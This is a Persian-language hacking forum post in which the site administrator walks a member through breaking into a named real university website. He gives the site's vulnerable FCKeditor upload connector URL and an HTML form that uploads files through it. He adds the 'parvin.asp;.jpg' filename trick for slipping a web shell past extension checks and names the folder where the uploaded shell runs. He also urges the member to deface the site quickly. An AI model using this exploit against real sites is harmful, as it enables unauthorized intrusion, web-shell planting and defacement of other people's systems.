• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت

Parsi Coders > Security and influence > Influence > LEARNING HACKING > اموزش XSS و کدهای ان >

امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: اموزش XSS و کدهای ان
حالت خطی
آفلاین
Amin_Mansouri
مدیر کل سایت


*
ارسال‌ها: 4,843
موضوع‌ها: 1,610
تاریخ عضویت: Apr 2011
اعتبار: 158
#17
01-23-2012، 12:46 PM (آخرین تغییر در ارسال: 01-23-2012، 12:50 PM توسط Amin_Mansouri.)
چطوری جبران میکنی ؟ :d (شوخی)
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده
کد:
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن

کد :

کد:
<strong>parsicoders File Uploader Exploit In FCKeditor</strong>
<form enctype="multipart/form-data" action="
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
حالا فایل parvin.html رو اجرا کن !

حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر

کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)

هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده

کد:
parvin.asp;.jpg


فایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن
کد:
http://jjs.uestc.edu.cn/upload/file

به همین راحتی و به همین باحالی :P


گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 07:15 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 08:14 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-22-2012، 11:24 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 11:30 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-22-2012، 11:40 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 11:46 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:01 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:14 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:21 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:35 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:40 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:47 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:50 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:58 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 03:20 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 11:07 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:46 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 03:29 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 03:31 PM
RE: اموزش XSS و کدهای ان - توسط Ghoghnus - 06-08-2012، 12:43 AM
RE: اموزش XSS و کدهای ان - توسط hacker black - 08-10-2012، 03:18 AM

موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  اموزش DDOS Amin_Mansouri 14 38,634 01-06-2017، 02:16 PM
آخرین ارسال: taktok
  اموزش هک مودم ADSL Amin_Mansouri 7 20,854 09-06-2016، 12:36 AM
آخرین ارسال: A.S
  کلیپ اموزش حرفه ای sql injection Amin_Mansouri 0 4,260 06-07-2012، 11:58 PM
آخرین ارسال: Amin_Mansouri
  اموزش حمله Sql injection بصورت انلاین Amin_Mansouri 0 6,156 06-05-2012، 11:28 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 6 مهمان